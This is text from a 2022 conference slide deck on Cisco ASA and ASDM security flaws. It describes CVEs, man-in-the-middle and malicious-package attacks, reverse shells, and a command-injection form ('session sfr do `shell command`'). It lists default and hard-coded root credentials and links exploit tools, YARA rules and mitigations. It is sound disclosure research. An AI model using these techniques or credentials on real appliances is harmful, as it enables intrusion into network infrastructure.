US 22 Baines Do Not Trust The ASA Trojans

Do Not Trust the ASA, Trojans!
Jacob Baines
Lead Security Researcher, Rapid7
August 11, 2022
Introduction
Adaptive Security Appliance (ASA)
Original ASA
ASA-X ASA-X with FirePOWER Services

2
Introduction
ASA Virtual Appliance (ASAv)
3
ASAv Product Landing Page
Introduction
Sort of ASA
Firepower 4100 Series

ASA Service Module

Secure Firewall ISA3000
Secure Firewall 3100 Series

4
Firepower 1000 Series ASA Software Landing Page
Introduction
Adaptive Security Appliance (ASA)
5
Introduction
Do Not Trust the ASA
6
Introduction
Adaptive Security Device Manager (ASDM)
7
ASDM Product Landing Page
Understanding ASDM
Starting ASDM Client Overview
Request pdm.sgz
pdm.sgz
Load and
execute SGZ
contents Admin session
8
Exploiting ASDM
ASDM Client Does Not Verify the Server Cert
9
Exploiting ASDM
ASDM/ASA Man in the Middle
10
Exploiting ASDM
Man in the Middle with mitmproxy
11
Exploiting ASDM
What’s in the SGZ?
Contents of 7.18.1 SGZ

- 13472 class files
- 6 jars
- 1 prop file
- 4 properties files
- 3 txt files
- 1 SIGNATURE files
github.com/jbaines-r7/getchoo
12
Exploiting ASDM
SGZ Client Logic Isn’t Verified (CVE-2021-1585)
13
Cisco ASDM RCE Vulnerability (CVE-2021-1585)
Exploiting ASDM
CVE-2021-1585 Exploited via Evil Endpoint
1. Administrator connects to
attacker using the ASDM client
2. The attacker responds with a

malicious SGZ file.
3. A reverse shell is established from

the Administrator to the attacker
14
Exploiting ASDM
CVE-2021-1585 Exploits
Exploitation
- Missing SSL verification (No CVE) plus
SGZ code not verified (CVE-2021-1585)
- Evil endpoint or Man in the Middle
CVE-2021-1585
- Disclosed in July 2021 with no patch

- Failed patch in June 2022
- Remains unpatched as of July 2022
Public Exploits
- staystaystay
- Metasploit module
github.com/jbaines-r7/staystaystay
github.com/jbaines-r7/cisco_asa_research/
tree/main/modules/cve_2021_1585
15
Crafting a Malicious ASDM Package
Hacker Cat Can’t Get Inside Corpnet
16
Unless… We Modify the SGZ on the ASA!
17
How Does the SGZ Get On the ASA?
18
ASDM Binary Package Format

Magic
Description
File length
Hash
Filename
Filename
Header Filename Data offset
Data offset
Manifest Data offset Data length
Data length
Files Data length
Raw Data
19
Is this a Security Feature?
Magic
Description
File length
Filename
Hash Filename
Data offset
Data length
Files Data length
Raw Data
20
Nope, Just an MD5 Hash
Magic
Description
File length
Filename
Hash Filename
Data offset
Data length
Files Data length
Raw Data
21
Missing ASDM Package Verification (CVE-2022-20829)
22
ASA Will Host Any ASDM Package
23
ASDM Binary Package Contents

Magic 1. asdm50-install.msi
2. asdmversion.html
Description 3. dm-launcher.dmg
4. dm-launcher.msi
File length 5. pdm.sgz
Filename 6. pdmversion.html
Hash Filename 7. public/asa-pix.gif
Data offset 8. public/asdm.jnlp
Header Filename
Data offset 9. public/asdm32.gif
Data length 10. public/cert.jnlp
Manifest Data offset
Data length 11. public/cisco.gif
12. public/deployJava.js
Files Data length
13. public/dm-launcher.jar
14. public/index.html
15. public/jploader.jar
16. public/lzma.jar
17. public/retroweaver-rt-2.0.jar
Raw Data
18. public/startup.jnlp
19. version.prop
24
ASDM Binary Package Contains pdm.sgz

Magic 1. asdm50-install.msi
2. asdmversion.html
Description 3. dm-launcher.dmg
4. dm-launcher.msi
File length 5. pdm.sgz
Filename 6. pdmversion.html
Hash Filename 7. public/asa-pix.gif
Data offset 8. public/asdm.jnlp
Header Filename
Data offset 9. public/asdm32.gif
Data length 10. public/cert.jnlp
Manifest Data offset
Data length 11. public/cisco.gif
12. public/deployJava.js
Files Data length
13. public/dm-launcher.jar
14. public/index.html
15. public/jploader.jar
16. public/lzma.jar
17. public/retroweaver-rt-2.0.jar
Raw Data
18. public/startup.jnlp
19. version.prop
25
Extracting Cisco ASDM Binary Packages
The Way
- Parses and extracts ASDM packages
- Rebuilds ASDM packages
- Generates ASDM packages
CVE-2022-20829
- Disclosed to Cisco in February 2022

- ASA Software fix planned for August 2022
github.com/jbaines-r7/theway
26
Building Cisco ASDM Binary Packages
The Way
CVE-2022-20829

27
Generating Malicious ASDM Binary Packages
The Way
CVE-2022-20829

28
Malicious Cisco ASA
29
How To Get Malicious ASDM Package Installed?!
???
30
Supply Chain
31
Remotely Rooting the ASA-X FirePOWER Module
32
ASA-X with FirePOWER Services
33
ASA-X with FirePOWER Services Explained
34
Recreation of Image Published by Cisco
ASA-X with FirePOWER Services Explained
35
Accessing the FirePOWER Module via Cisco CLI
The command to invoke
FirePOWER shell from
ASA CLI
The FirePOWER
shell requires a new
set of credentials
(admin:Admin123)
FirePOWER module shell
36
expert Command Yields Root Shell
37
SSH Root Shell as a Feature
38
An Attacker’s Dream
39
Disable Root Shell via lockdown-sensor
40
ASDM Can Talk to the FirePOWER Module
41
ASDM Cannot Access the Root Shell
42
session sfr do `shell command`
43
session sfr do `shell command`
44
Tweetable Reverse Shell
45
session sfr do `ghost in the shell`
46
CVE-2022-20828: Authenticated RCE
47
ASDM Uses HTTP Basic Auth by Default
48
Default Creds are <blank>:<blank>
49
"ASDM Book 1" by Cisco
ASDM Logs Credentials to File
ASDM Client Credential Logging

- Assigned CVE-2022-20651
- We developed a Metasploit module that
hunts out the leaked credentials
50
HTTP Brute-Force Protection Disabled by Default
51
Metasploit ASDM Brute-Force Module
ASDM HTTP Brute-Force

- Generic HTTP brute-force won’t work due to
user agent requirements.
- Previous ASA brute-force modules hit the
clientless VPN interface.
- ASDM credentials can give privileged access
and aid in network pivoting!
- No shame in brute-force attacks. If it’s good
enough for GRU, it’s good enough for you.
tree/main/modules/asdm_bruteforce
52
CVE-2022-20828 Metasploit Module
Exploitation
- Authenticated command injection over
HTTP or SSH to establish a root shell
within FirePOWER module VM.
CVE-2022-20828
- Disclosed to vendor in March 2022

- Some versions patched in June 2022
- All patched by December 2022
53
Getting Root With an ASA-X
FirePOWER Boot Image
54
Getting Root With an ASA-X FirePOWER Boot Image
FirePOWER Module Not Installed, What Do?
55
Get a Root Shell Using a FirePOWER Boot Image
56
FirePOWER Module Installation
2
57
ASA 5506-X with FirePOWER Services 6.2.3 Software Download
Install the FirePOWER Boot Image via Cisco CLI
58
Install and Configure a FirePOWER Services Module on an ASA Platform
Drop to the FirePOWER Boot Image Shell
59
Install and Configure a FirePOWER Services Module on an ASA Platform
FirePOWER Boot Image Shell
60
Boot Image Root Shell via Hard-Coded Creds
cisco123
61
We’re Back!
62
Metasploit FirePOWER Boot Image Root Shell Module
Exploitation
- Exploit hard-coded credential establish root
shell on ASA-X with FirePOWER Services.
Not a vulnerability
- Disclosed to vendor in March 2022
- Vendor states this is not a vulnerability
- Fixed in Boot Image 7.0+
- Unpatchable? No mechanism to stop loading
of old boot images.
Exploits
- Python script
- SSH Metasploit module
github.com/jbaines-r7/slowcheetah
tree/main/modules/boot_image_shell
63
Distributable Malicious
FirePOWER Boot Image for ASA-X
64
Distributable Malicious FirePOWER Boot Image for ASA-X
Hacker Cat Has No Access!
65
FirePOWER Boot Image Is… A Generic Bootable Linux ISO
66
Distribute a Malicious ISO / Boot Image?
67
Pinch Me: Malicious Boot Image Creator
Exploitation
- Create a Tiny Core Linux Bootable ISO
- Get Administrator to install it
- Sends a reverse shell to configured IP:port
Not a vulnerability
- No security expectations for the boot image.
- Doesn’t persist through reboots.
Features
- Reverse Shell
- SSH
- DOOM-ASCII
github.com/jbaines-r7/pinchme
68
Profit
69
Distributable Malicious
FirePOWER Install Package for
ASA-X
70
Distributable Malicious FirePOWER Install Package for ASA-X
ASA-X FirePOWER Module Install Package
2
71
FirePOWER Boot Image Supports Signed Install Packages
72
FirePOWER Module Signed Install Package
73
FirePOWER Boot Image Supports Unsigned Install Packages
74
Distribute a Malicious Install Package?
75
FirePOWER Module Unsigned Install Package
76
Convert a Secure Package to an Insecure Package
77
Create Malicious Install Packages
Exploitation
- Input valid and signed Cisco created
package. Output valid unsigned package
containing malicious code.
- Persistent payload. Survive reboots and
upgrades.
Not a vulnerability
- No security expectations on installation.
github.com/jbaines-r7/whatsup
78
Create Malicious Install Packages
Exploitation
- Input valid and signed Cisco created
package. Output valid unsigned package
containing malicious code.
- Persistent payload. Survive reboots and
upgrades.
Not a vulnerability
- No security expectations on installation.
github.com/jbaines-r7/whatsup
79
Back Again!
80
…Not a Supply Chain Issue?
81
Exploitation Summary
Do Not Trust the ASA?
This Talk Discussed

- Man in the middle problems
- Credential leaks
- Code signing issues
- Package signing issues
- Root shell as a feature
- Hard-coded credentials for a root shell
- Remote command injection for root access
- Executing arbitrary bootable ISO
82
Indicators and Mitigations
83
Not This. Never This.
84
YARA Rules
New YARA Rules

- Detect malicious ASDM packages
- Detect execution of malicious SGZ
- Detect credentials in ASDM log files
- Detect unsigned FirePOWER install packages
github.com/jbaines-r7/cisco_asa_research/blob/main/yara/
85
Apply ASA and ASDM Patches?

● Eventually?
○ No patches planned for ASA-X with FirePOWER
Services boot images or installation packages
○ CVE-2021-1585 still unpatched
○ CVE-2022-20829 still unpatched (maybe?)
○ CVE-2022-20828 patches planned through
December 2022
● What to do when patches aren’t available?
○ Mitigating controls: limit access and isolate
○ If possible, remove from network critical path
○ Rotate passwords
● What to do about the ASA-X with FirePOWER Services?
○ Multiple distributable root shell vectors
○ Virtual machine root shell is a default feature
○ If possible, accelerate retirement and replace
○ Audit the virtual machine root shell regularly
○ Audit Cisco CLI / ASDM logins regularly
86
Thank you!
Slides & Code:

https://github.com/jbaines-r7/cisco_asa_research
@jbaines-r7 @Junior_Baines @jbaines-r7

87

US 22 Baines Do Not Trust The ASA Trojans

Uploaded by

Document Information

Original Description:

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

US 22 Baines Do Not Trust The ASA Trojans

Uploaded by

Copyright:

Available Formats

Do Not Trust the ASA, Trojans!

Adaptive Security Appliance (ASA)

ASA-X ASA-X with FirePOWER Services

ASA Virtual Appliance (ASAv)

Firepower 4100 Series

ASA Service Module

Firepower 9300 Series

Secure Firewall 3100 Series

Adaptive Security Appliance (ASA)

Do Not Trust the ASA

Adaptive Security Device Manager (ASDM)

Starting ASDM Client Overview

ASDM Client Does Not Verify the Server Cert

ASDM/ASA Man in the Middle

Man in the Middle with mitmproxy

What’s in the SGZ?

Contents of 7.18.1 SGZ

CVE-2021-1585 Exploited via Evil Endpoint

2. The attacker responds with a

3. A reverse shell is established from

- Disclosed in July 2021 with no patch

Hacker Cat Can’t Get Inside Corpnet

Unless… We Modify the SGZ on the ASA!

How Does the SGZ Get On the ASA?

ASDM Binary Package Format

Is this a Security Feature?

Nope, Just an MD5 Hash

ASA Will Host Any ASDM Package

ASDM Binary Package Contents

ASDM Binary Package Contains pdm.sgz

Extracting Cisco ASDM Binary Packages

- Disclosed to Cisco in February 2022

Building Cisco ASDM Binary Packages

- Disclosed to Cisco in February 2022

- Disclosed to Cisco in February 2022

Malicious Cisco ASA

ASA-X with FirePOWER Services

FirePOWER module shell

expert Command Yields Root Shell

Disable Root Shell via lockdown-sensor

ASDM Cannot Access the Root Shell

session sfr do `shell command`

session sfr do `shell command`

Tweetable Reverse Shell

session sfr do `ghost in the shell`

CVE-2022-20828: Authenticated RCE

ASDM Uses HTTP Basic Auth by Default

Default Creds are <blank>:<blank>

ASDM Logs Credentials to File

ASDM Client Credential Logging

Metasploit ASDM Brute-Force Module

ASDM HTTP Brute-Force

CVE-2022-20828 Metasploit Module

- Disclosed to vendor in March 2022

FirePOWER Module Installation

Drop to the FirePOWER Boot Image Shell

Hacker Cat Has No Access!

Distribute a Malicious ISO / Boot Image?

Pinch Me: Malicious Boot Image Creator

ASA-X FirePOWER Module Install Package

FirePOWER Module Signed Install Package

Distribute a Malicious Install Package?